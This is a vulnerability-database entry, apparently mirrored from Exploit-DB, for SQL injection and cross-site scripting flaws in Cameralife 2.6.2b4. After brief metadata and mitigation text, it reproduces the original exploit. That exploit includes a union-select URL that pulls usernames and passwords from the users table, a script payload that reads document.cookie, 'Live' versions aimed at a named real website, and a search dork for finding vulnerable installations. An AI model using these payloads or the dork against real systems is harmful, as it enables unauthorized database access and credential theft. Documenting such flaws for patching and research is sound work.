Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

Cameralife

by:

BackDoor

8.8

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: Cameralife

Affected Version From: 2.6.2b4

Affected Version To: 2.6.2b4

Patch Exists: YES

Related CWE: N/A

CPE: a:cameralife:cameralife:2.6.2b4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities

Cameralife 2.6.2b4 is vulnerable to a remote SQL injection and XSS attack. An attacker can exploit the vulnerability by sending a specially crafted URL to the target application. The URL contains a malicious SQL query which can be used to extract sensitive information from the database. The attacker can also inject malicious JavaScript code into the application which can be used to steal user credentials or perform other malicious activities.

Mitigation:

The application should be patched to the latest version and input validation should be implemented to prevent malicious input from being accepted.

Source

Exploit-DB raw data:

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"
BackDoor Cyber-Security.TIM //Lojistik

# milw0rm.com [2008-10-09]